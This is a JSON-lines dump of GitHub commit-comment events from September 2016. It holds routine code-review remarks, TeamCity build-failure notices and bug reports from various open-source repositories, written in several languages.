{"id":"4596566651","type":"CommitCommentEvent","actor":{"login":"pulecp"},"repo":{"name":"pulecp/check_crm"},"payload":{"comment":{"id":19114561,"position":null,"line":null,"path":null,"commit_id":"0711a9137af3aafc98ae951d328400be48f8c673","created_at":"2016-09-21T14:21:48Z","updated_at":"2016-09-21T14:21:48Z","body":"You see the code of crm_mon tool: https://github.com/ClusterLabs/pacemaker/blob/master/tools/crm_mon.c#L2836\r\n\r\nand here you can see the commit which changed that: https://github.com/ClusterLabs/pacemaker/commit/af728cbf838ed2a0517b994fe1be8d8c57453dce#diff-76363b994a130f8d7edd587cad510d77L2671\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-21T14:21:48Z"}
{"id":"4596569078","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19114567,"position":null,"line":null,"path":null,"commit_id":"e327cf9988a6bcc0c65c5c2b1523368935ebaa64","created_at":"2016-09-21T14:22:10Z","updated_at":"2016-09-21T14:22:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1080](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13772&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 3 (1 new), passed: 215, ignored: 3 Build time: 00:09:24\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for a vehicle returns a list of OperationResults: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for an update request returns a list of OperationResults: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T14:22:10Z"}
{"id":"4596569749","type":"CommitCommentEvent","actor":{"login":"samanthag21"},"repo":{"name":"samanthag21/phase-0-tracks"},"payload":{"comment":{"id":19114570,"position":null,"line":null,"path":null,"commit_id":"5a24a9afab58fd939b02275c9d5820c58c0be7ed","created_at":"2016-09-21T14:22:16Z","updated_at":"2016-09-21T14:22:16Z","body":"@omgmakeme"}},"created_at":"2016-09-21T14:22:16Z"}
{"id":"4596578751","type":"CommitCommentEvent","actor":{"login":"evsheffield"},"repo":{"name":"iVantage/generator-ivh-react-component"},"payload":{"comment":{"id":19114592,"position":31,"line":31,"path":"generators/app/templates/README.md","commit_id":"e367ff2486ef884fb7e6066f084c6b0f8dc21880","created_at":"2016-09-21T14:23:40Z","updated_at":"2016-09-21T14:23:40Z","body":"You know I can't turn down a green square. ;)"}},"created_at":"2016-09-21T14:23:40Z"}
{"id":"4596579094","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19114596,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-21T14:23:43Z","updated_at":"2016-09-21T14:23:43Z","body":"reverting which comments? reverting the reverts? my 17beta2 branch is now up-to-date, can you give that a try and see if it's missing anything?"}},"created_at":"2016-09-21T14:23:43Z"}
{"id":"4596588582","type":"CommitCommentEvent","actor":{"login":"renanlecaro"},"repo":{"name":"meteor/simple-todos"},"payload":{"comment":{"id":19114621,"position":null,"line":null,"path":null,"commit_id":"23156828acfc00fbcc682d6ab2212b18f85ff660","created_at":"2016-09-21T14:25:09Z","updated_at":"2016-09-21T14:25:09Z","body":"This code crashes on my fresh install, i have to import assert for it to work : \r\n`\r\nimport {chai} from 'meteor/practicalmeteor:chai';\r\nvar assert = chai.assert;\r\n`"}},"created_at":"2016-09-21T14:25:09Z"}
{"id":"4596590422","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19114624,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T14:25:25Z","updated_at":"2016-09-21T14:25:25Z","body":"不应该啊，今晚把我搞晕了\r\n\r\n第一句 if !user.newbie? 你们 VIP 都直接跳过了，不会到后面哪句"}},"created_at":"2016-09-21T14:25:25Z"}
{"id":"4596591431","type":"CommitCommentEvent","actor":{"login":"rawgni"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19114627,"position":200,"line":1137,"path":"js/main.js","commit_id":"34fbf98776b9c056e0428ee0f054b43963d2be62","created_at":"2016-09-21T14:25:34Z","updated_at":"2016-09-21T14:25:34Z","body":"the code looks correct. did it give you error ?"}},"created_at":"2016-09-21T14:25:34Z"}
{"id":"4596594311","type":"CommitCommentEvent","actor":{"login":"Chinipage"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114635,"position":59,"line":59,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:26:01Z","updated_at":"2016-09-21T14:26:01Z","body":"Claro, en smalltalk no existe en concepto de atributo publico, por eso\ntodos los atributos que cree (o la gran mayoria) son privados. No te digo a\nque te referis con que estoy accediendo a propiedades de otra clase, si te\nreferis a lo de pedirle el tag al Controller no lo veo mal porque\njustamente es un metodo y es un singletone, pero si te hace ruido podemos\ndefinir el metodo en las clases que lo usan y que dentro del metodo llamen\nal Controller. Sino habria que definir ese metodo en cada clase que lo use\ny perderia esto de cambiar en un solo lugar. No se si me explico.\n\nEl 21 de septiembre de 2016, 11:17, 親日［しんニチ］ <notifications@github.com>\nescribió:\n\n> A mí en Paradigmas de Programación me enseñaron que no es una buena\n> práctica acceder a las propiedades de una clase desde otra clase (rompés el\n> encapsulamiento). Lo mejor práctica y lo que se suele hacer es hacer\n> propiedades privadas (private) o protegidas (protected) y acceder a ellas\n> a través de *setters* y *getters*.\n>\n> Tengo entendido que Smalltalk (o Pharo, no sé) ni siquiera te deja acceder\n> a propiedades desde otras clases; te obliga a crear los *setters* y\n> *getters*. Por eso me llamó la atención que vos no los usaras acá.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Chinipage/tp-algoritmosComplejos/commit/6b28854dc1804e9d07b6eec42e8b91436eef0b00#commitcomment-19114475>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIM_E56ixFrxUiYZzT78w7lFAFC_aBnCks5qsTx2gaJpZM4KC11->\n> .\n>\n"}},"created_at":"2016-09-21T14:26:01Z"}
{"id":"4596595331","type":"CommitCommentEvent","actor":{"login":"HamdiBayhan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19114639,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T14:26:11Z","updated_at":"2016-09-21T14:26:11Z","body":"Okey, I'm going to change the searchkick with ransack."}},"created_at":"2016-09-21T14:26:11Z"}
{"id":"4596595475","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19114640,"position":null,"line":null,"path":null,"commit_id":"8de872fd86b849c3c89c75ddb460dbcc15a57fe5","created_at":"2016-09-21T14:26:12Z","updated_at":"2016-09-21T14:26:12Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 182](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1213&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-21T14:26:12Z"}
{"id":"4596602359","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19114652,"position":null,"line":null,"path":null,"commit_id":"8de872fd86b849c3c89c75ddb460dbcc15a57fe5","created_at":"2016-09-21T14:27:12Z","updated_at":"2016-09-21T14:27:12Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 182](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1213&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:00"}},"created_at":"2016-09-21T14:27:12Z"}
{"id":"4596608886","type":"CommitCommentEvent","actor":{"login":"tcK1"},"repo":{"name":"EmmittJ/PoESkillTree"},"payload":{"comment":{"id":19114665,"position":null,"line":null,"path":null,"commit_id":"69bbf35197cc0c9302ec6447a59448676ad79a78","created_at":"2016-09-21T14:28:11Z","updated_at":"2016-09-21T14:28:11Z","body":"Amazing! Thanks for the update :+1: "}},"created_at":"2016-09-21T14:28:11Z"}
{"id":"4596609048","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19114667,"position":13,"line":123,"path":"language/src/ceylon/language/annotations.ceylon","commit_id":"0ad3cf6ae0fc311e895c313e8b3bd7d67df1f414","created_at":"2016-09-21T14:28:12Z","updated_at":"2016-09-21T14:28:12Z","body":"\"in the body of *a toplevel* type declaration.\" ?"}},"created_at":"2016-09-21T14:28:12Z"}
{"id":"4596610062","type":"CommitCommentEvent","actor":{"login":"tkntrec"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19114669,"position":null,"line":null,"path":null,"commit_id":"efc76df260c8dc1865cbf27477bd4d7941a0b545","created_at":"2016-09-21T14:28:21Z","updated_at":"2016-09-21T14:28:21Z","body":"更新お疲れ様です。\r\nエラーの報告をさせていただきます。\r\n\r\n・struct DisplayNameValuePair について、VS2010ではコンパイルエラーとなる\r\n[err message.txt](https://github.com/xtne6f/EDCB/files/485268/err.message.txt)\r\n\r\n次のいずれかの修正で通るようです。\r\n(1) line 3  <code>class DisplayNameValuePair</code>\r\n(2) line 5  <code>public DisplayNameValuePair(string displayName, byte value) : this()</code>\r\n\r\n宜しくお願いします。\r\n\r\n"}},"created_at":"2016-09-21T14:28:21Z"}
{"id":"4596611844","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19114673,"position":null,"line":null,"path":null,"commit_id":"59575d539b836d01acb63af3650149e41dcd4e6a","created_at":"2016-09-21T14:28:39Z","updated_at":"2016-09-21T14:28:39Z","body":"Indeed. Or document anonymous modules at all."}},"created_at":"2016-09-21T14:28:39Z"}
{"id":"4596613723","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19114677,"position":11,"line":121,"path":"language/src/ceylon/language/annotations.ceylon","commit_id":"0ad3cf6ae0fc311e895c313e8b3bd7d67df1f414","created_at":"2016-09-21T14:28:55Z","updated_at":"2016-09-21T14:28:55Z","body":"~~be~~"}},"created_at":"2016-09-21T14:28:55Z"}
{"id":"4596615508","type":"CommitCommentEvent","actor":{"login":"n8659150"},"repo":{"name":"n8659150/iEagleNest"},"payload":{"comment":{"id":19114680,"position":null,"line":null,"path":null,"commit_id":"b4df1efbd9eba73731c2edf019cf21d8d5420d0f","created_at":"2016-09-21T14:29:11Z","updated_at":"2016-09-21T14:29:11Z","body":"#2 \r\n为了测试需要，我已将pdfmake所需要用到的动态数据改成了静态数据，测试代码在mainctrl.js中的“pdfmake dummy data test”中(line 492 - 666)，原来的代码注释掉了。可去http://pdfmake.org/playground.html 查看效果，测试完毕可还原至原来的数据绑定。"}},"created_at":"2016-09-21T14:29:11Z"}
{"id":"4596623155","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19114701,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-21T14:30:21Z","updated_at":"2016-09-21T14:30:21Z","body":"In 'toggle edit mode' of Metrics tab in Edit panel, ( Raw Query), what you have shown in screenshot,  the web service response gives the alias name only. Here it is - \r\n{\r\n\t\"success\": true,\r\n\t\"name\": \"select\",\r\n\t\"body\": [{\r\n\t\t\"query\": \"aggregate.mean(os.cpu.all.active_percentage) {active}\",\r\n\t\t**\"name\": \"active\",**\r\n\t\t\"type\": \"series\",\r\n\r\n\r\nbut in other mode - ie in this screenshot, \r\n![alias - function removal screenshot](https://cloud.githubusercontent.com/assets/21314219/18715087/01a14998-7fe6-11e6-958c-19276bc5de09.PNG)\r\n\r\nThe webservice response is like this - \r\n{\r\n\t\"success\": true,\r\n\t\"name\": \"select\",\r\n\t\"body\": [{\r\n\t\t\"query\": \"aggregate.mean(os.cpu.all.active_percentage {active})\",\r\n\t\t**\"name\": \"aggregate.mean(active)\",**\r\n\t\t\"type\": \"series\",\r\n\r\n\r\nSo removed the function name from this. Is there any better way to do this? I'll incorporate it."}},"created_at":"2016-09-21T14:30:21Z"}
{"id":"4596627539","type":"CommitCommentEvent","actor":{"login":"bpoldrack"},"repo":{"name":"bpoldrack/datalad"},"payload":{"comment":{"id":19114707,"position":8,"line":596,"path":"datalad/distribution/install.py","commit_id":"5f5de3673af696670ca6f806626ea31913ab2d02","created_at":"2016-09-21T14:31:02Z","updated_at":"2016-09-21T14:31:02Z","body":"Actually, it should not be recursive at all. We recursively installed everything at this point and want to get the data for these datasets. If there was something beneath such a dataset, that we also want to get, it is part of `installed_items` anyway."}},"created_at":"2016-09-21T14:31:02Z"}
{"id":"4596627630","type":"CommitCommentEvent","actor":{"login":"GitLiamuk"},"repo":{"name":"GitLiamuk/GitHub-Client-Test"},"payload":{"comment":{"id":19114708,"position":null,"line":null,"path":null,"commit_id":"517ffca178eb93bf83c1d3531030e9d27238175d","created_at":"2016-09-21T14:31:03Z","updated_at":"2016-09-21T14:31:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;W4ACL6F3&#x2F;1-update-readme\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Update README</a>"}},"created_at":"2016-09-21T14:31:03Z"}
{"id":"4596630482","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19114711,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T14:31:29Z","updated_at":"2016-09-21T14:31:29Z","body":"> I think a fair number of options are not needed\r\n\r\nPlease define \"not needed\": as in \"not needed for you\" or \"impossible to use on current hardware\"? I'm in favor of removing any options from any kernel config if they are 100% useless for selected SoC, but everything else (like I2C/SPI sensors, USB network and audio cards) should be left as-is\r\n\r\n> 1/ what is the basic set of options required for Armbian boards (build-in+modules)?\r\n\r\nA list of these options can be made, but the end result would be pretty much useless for anything other than testing with reduced compilation time\r\n\r\n> 2/ the \"often\" requested options by users (so likely to be provided as modules)?\r\n\r\nAnything that is not required (and can be compiled as modules) should be made as modules, especially since most (if not all) board configurations now support initrd with default boot script.\r\n\r\n> 3/ so for all the others options => if needed by a user, the Armbian tool exists to compile the kernel\r\n(to paraphase the MasterCard ads: \"for everything else there is Armbian tool\")\r\n\r\nI don't like this approach, users expect as much functionality as you can get by default, if you would need to set up compilation environment and deal manually with upgrades if you only want to connect some kind of sensor, DVB stick or USB camera, it wouldn't be a good OS for inexperienced users"}},"created_at":"2016-09-21T14:31:29Z"}
{"id":"4596630559","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19114712,"position":null,"line":null,"path":null,"commit_id":"f36edac1ce279486e92f27b5997b0c5a0c8a2201","created_at":"2016-09-21T14:31:30Z","updated_at":"2016-09-21T14:31:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1081](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13779&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T14:31:30Z"}
{"id":"4596638302","type":"CommitCommentEvent","actor":{"login":"jzac"},"repo":{"name":"jzac/YTtest"},"payload":{"comment":{"id":19114727,"position":null,"line":null,"path":null,"commit_id":"35baa7f57bc8859eae1a00c8d9b574a0070269d7","created_at":"2016-09-21T14:32:39Z","updated_at":"2016-09-21T14:32:39Z","body":"There's a spelling mistake."}},"created_at":"2016-09-21T14:32:39Z"}
{"id":"4596643645","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19114740,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-21T14:33:27Z","updated_at":"2016-09-21T14:33:27Z","body":"As I'm implementing data structures in Go for my own learning purposes, do you recommend implementing them for a specific type (eg, binary search tree for ints) or for any type (ie interface{})? The second is more annoying bc I'll have to create an interface type with some LessThan() method or else pass a comparator func to all of my operations.\n\nSent from my iPhone\n\nOn Sep 20, 2016, at 6:12 PM, Joe Tsai <notifications@github.com> wrote:\n\n> In terms of practical usage, a stack is probably not a data structure worth abstracting as a separate package. When you remove the len field, Pop is equivalent to slicing off the last element, Push is equivalent to append.\n> \n> In terms of implementing a stack for your own learning, I think Pop, Push, Len is a perfectly fine set of methods that it should have.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-21T14:33:27Z"}
{"id":"4596648724","type":"CommitCommentEvent","actor":{"login":"MilouLicorne"},"repo":{"name":"MilouLicorne/Td-SE1"},"payload":{"comment":{"id":19114748,"position":null,"line":null,"path":null,"commit_id":"10efcd2159edca0ab3aadf9bd6de8724a9465521","created_at":"2016-09-21T14:34:13Z","updated_at":"2016-09-21T14:34:13Z","body":"Image"}},"created_at":"2016-09-21T14:34:13Z"}
{"id":"4596649804","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19114749,"position":12,"line":12,"path":"rpcd/playbooks/ceph-mitaka-hostname-upgrade.yml","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-21T14:34:23Z","updated_at":"2016-09-21T14:34:23Z","body":"It would be beter if this could be a part of ``rpc-pre-upgrade.yml`` instead of being it's own playbook."}},"created_at":"2016-09-21T14:34:23Z"}
{"id":"4596651647","type":"CommitCommentEvent","actor":{"login":"danielgindi"},"repo":{"name":"danielgindi/Charts"},"payload":{"comment":{"id":19114754,"position":null,"line":null,"path":null,"commit_id":"95ea820c3a56980161e091852f988b8056ee6ba0","created_at":"2016-09-21T14:34:39Z","updated_at":"2016-09-21T14:34:39Z","body":"Got it!"}},"created_at":"2016-09-21T14:34:39Z"}
{"id":"4596657566","type":"CommitCommentEvent","actor":{"login":"avoidwork"},"repo":{"name":"avoidwork/haro"},"payload":{"comment":{"id":19114762,"position":null,"line":null,"path":null,"commit_id":"1293b9c31e8cbeac9a3bd6d1935d525c60e403bd","created_at":"2016-09-21T14:35:32Z","updated_at":"2016-09-21T14:35:32Z","body":"![quicksilver](https://cloud.githubusercontent.com/assets/369698/18715410/1ddac78c-7fe7-11e6-9fb1-acf6ff9dfee8.gif)\r\n"}},"created_at":"2016-09-21T14:35:32Z"}
{"id":"4596658080","type":"CommitCommentEvent","actor":{"login":"Eric-Guo"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19114763,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T14:35:36Z","updated_at":"2016-09-21T14:35:36Z","body":"也对，反正现在对了。。我发现puma有时候发布的时候，跑的未必是最新版程序，很奇怪。。"}},"created_at":"2016-09-21T14:35:36Z"}
{"id":"4596659530","type":"CommitCommentEvent","actor":{"login":"lduiso"},"repo":{"name":"alexanderpinchao/libreria_fuente_rayos"},"payload":{"comment":{"id":19114768,"position":null,"line":null,"path":null,"commit_id":"62092dc887e4fcd67c56239bd8804051d678b13b","created_at":"2016-09-21T14:35:49Z","updated_at":"2016-09-21T14:35:49Z","body":"gracias"}},"created_at":"2016-09-21T14:35:49Z"}
{"id":"4596663040","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19114776,"position":7,"line":144,"path":"src/server/game/Movement/MovementGenerators/SplineChainMovementGenerator.cpp","commit_id":"d3214a0012cf93a5e66d1dc405ac90c4abc1b8c3","created_at":"2016-09-21T14:36:20Z","updated_at":"2016-09-21T14:36:20Z","body":"Brackets after ifs, if the next statement is not a single line (another if block in this case) pleeeeaseeeeee"}},"created_at":"2016-09-21T14:36:20Z"}
{"id":"4596664009","type":"CommitCommentEvent","actor":{"login":"MZorzy"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19114780,"position":200,"line":1137,"path":"js/main.js","commit_id":"34fbf98776b9c056e0428ee0f054b43963d2be62","created_at":"2016-09-21T14:36:29Z","updated_at":"2016-09-21T14:36:29Z","body":"yes. firefox 49, on win 7 give e blank page. (running bot/map on Debian 8)\r\nonly after change ** -> * and , -> ,  map is shown\r\n"}},"created_at":"2016-09-21T14:36:29Z"}
{"id":"4596665654","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19114783,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-21T14:36:42Z","updated_at":"2016-09-21T14:36:42Z","body":"But still, most will be just reverted or not. And enums with the same name\nin the most events just don't seem right.\n\n21 сент. 2016 г. 17:47 пользователь \"Tux\" <notifications@github.com>\nнаписал:\n\n> It can't be. Certain events might differ in what results are offered.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19113923>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc0WldZatIdHore1vQhIK-iueDftZWsks5qsTWEgaJpZM4KCwZ->\n> .\n>\n"}},"created_at":"2016-09-21T14:36:42Z"}
{"id":"4596669353","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19114792,"position":6,"line":3338,"path":"src/server/game/Maps/Map.cpp","commit_id":"820e8433917fe27c4a1093482532c6986b519e1f","created_at":"2016-09-21T14:37:15Z","updated_at":"2016-09-21T14:37:15Z","body":"In this case, brackets are not necessary because the statement is a single line"}},"created_at":"2016-09-21T14:37:15Z"}
{"id":"4596672115","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19114798,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-21T14:37:41Z","updated_at":"2016-09-21T14:37:41Z","body":"Ich halt die Daumen für LTC!"}},"created_at":"2016-09-21T14:37:41Z"}
{"id":"4596673212","type":"CommitCommentEvent","actor":{"login":"EMiroshko"},"repo":{"name":"OKchesterOK/TheNailRoom"},"payload":{"comment":{"id":19114801,"position":45,"line":45,"path":"Temp/temp.html","commit_id":"070e91a2bbbce97cb4c109bed5fdbb5a661e1c00","created_at":"2016-09-21T14:37:50Z","updated_at":"2016-09-21T14:37:50Z","body":"Please, add extra line\r\n"}},"created_at":"2016-09-21T14:37:50Z"}
{"id":"4596674266","type":"CommitCommentEvent","actor":{"login":"tobi-sh"},"repo":{"name":"tobi-sh/Jira-Issue-Card-Printer"},"payload":{"comment":{"id":19114802,"position":null,"line":null,"path":null,"commit_id":"51b2328dcfc4c1d4f82b4e93c00a9b3bc9548192","created_at":"2016-09-21T14:38:00Z","updated_at":"2016-09-21T14:38:00Z","body":"Das war keine Absicht und bleibt drinn"}},"created_at":"2016-09-21T14:38:00Z"}
{"id":"4596676212","type":"CommitCommentEvent","actor":{"login":"rawgni"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19114805,"position":200,"line":1137,"path":"js/main.js","commit_id":"34fbf98776b9c056e0428ee0f054b43963d2be62","created_at":"2016-09-21T14:38:16Z","updated_at":"2016-09-21T14:38:16Z","body":"but the calculation requires square root and not multiplication."}},"created_at":"2016-09-21T14:38:16Z"}
{"id":"4596678805","type":"CommitCommentEvent","actor":{"login":"oocta"},"repo":{"name":"oocta/kaywon-ip2"},"payload":{"comment":{"id":19114812,"position":18,"line":40,"path":"week2/Ahn Ga-Eun/index.html","commit_id":"76f8b3cacbb6a0fdc069c7e315455ea8db6d8225","created_at":"2016-09-21T14:38:39Z","updated_at":"2016-09-21T14:38:39Z","body":"aboutMe는 배열 객체이기 때문에 배열 객체 내부의 원소를 순서대로 출력해주려면, []를 통해서 원소의 인덱스로 접근해야하지 않을까요? :-)"}},"created_at":"2016-09-21T14:38:39Z"}
{"id":"4596681611","type":"CommitCommentEvent","actor":{"login":"dpolonijo"},"repo":{"name":"dpolonijo/test"},"payload":{"comment":{"id":19114822,"position":null,"line":null,"path":null,"commit_id":"e459f1a32bd333c3a58e395295118f7fdfb1ec58","created_at":"2016-09-21T14:39:04Z","updated_at":"2016-09-21T14:39:04Z","body":"bla"}},"created_at":"2016-09-21T14:39:04Z"}
{"id":"4596683011","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19114826,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T14:39:16Z","updated_at":"2016-09-21T14:39:16Z","body":"To make myself clear, I won't try to minimize the option set, that is a daunting task, but I remember seeing things that clearly won't be useful (AMD CPU specific options or something like that) I'll double check that they are actually in the repository, and were not added on my side (I tried the 4.8 branch).\r\n\r\nThe controversial ones I won't touch ;-)"}},"created_at":"2016-09-21T14:39:16Z"}
{"id":"4596683292","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19114828,"position":null,"line":null,"path":null,"commit_id":"f36edac1ce279486e92f27b5997b0c5a0c8a2201","created_at":"2016-09-21T14:39:18Z","updated_at":"2016-09-21T14:39:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1081](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13779&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 130, ignored: 3; compilation error: Scala compiler in Test (new) Build time: 00:07:48\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.system_info adds unique numbers for each id-field: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T14:39:18Z"}
{"id":"4596689361","type":"CommitCommentEvent","actor":{"login":"pascalgrimaud"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19114840,"position":256,"line":1274,"path":"generators/generator-base.js","commit_id":"7c72054d786ae2c91823769a31d4e7774bbc9ab3","created_at":"2016-09-21T14:40:17Z","updated_at":"2016-09-21T14:40:17Z","body":"@deepu105 : not sure it works.\r\nI have these errors on my machine, and @PierreBesson too:\r\n\r\n```\r\nutil de gestion de certificats et de clés\r\n\r\nCommandes :\r\n\r\n -certreq            Génère une demande de certificat\r\n -changealias        Modifie l'alias d'une entrée\r\n -delete             Supprime une entrée\r\n -exportcert         Exporte le certificat\r\n -genkeypair         Génère une paire de clés\r\n -genseckey          Génère une clé secrète\r\n -gencert            Génère le certificat à partir d'une demande de certificat\r\n -importcert         Importe un certificat ou une chaîne de certificat\r\n -importpass         Importe un mot de passe\r\n -importkeystore     Importe une entrée ou la totalité des entrées depuis un autre fichier de clés\r\n -keypasswd          Modifie le mot de passe de clé d'une entrée\r\n -list               Répertorie les entrées d'un fichier de clés\r\n -printcert          Imprime le contenu d'un certificat\r\n -printcertreq       Imprime le contenu d'une demande de certificat\r\n -printcrl           Imprime le contenu d'un fichier de liste des certificats révoqués (CRL)\r\n -storepasswd        Modifie le mot de passe de banque d'un fichier de clés\r\n\r\nUtiliser \"keytool -command_name -help\" pour la syntaxe de command_name\r\n/bin/sh: 2: -genkey: not found\r\n/bin/sh: 3: -noprompt: not found\r\n/bin/sh: 4: -keyalg: not found\r\n/bin/sh: 5: -alias: not found\r\n/bin/sh: 6: -keystore: not found\r\n/bin/sh: 7: -storepass: not found\r\n/bin/sh: 8: -keypass: not found\r\n/bin/sh: 9: -keysize: not found\r\n/bin/sh: 10: -dname: not found\r\n      1) \"before each\" hook\r\n    Gateway with UAA server\r\n      2) creates expected files for UAA auth with the Gateway application type\r\n```"}},"created_at":"2016-09-21T14:40:17Z"}
{"id":"4596693465","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19114848,"position":null,"line":null,"path":null,"commit_id":"22f37c7fc63ecd21c4d834b1f44882990b9683b6","created_at":"2016-09-21T14:40:52Z","updated_at":"2016-09-21T14:40:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1082](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13782&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T14:40:52Z"}
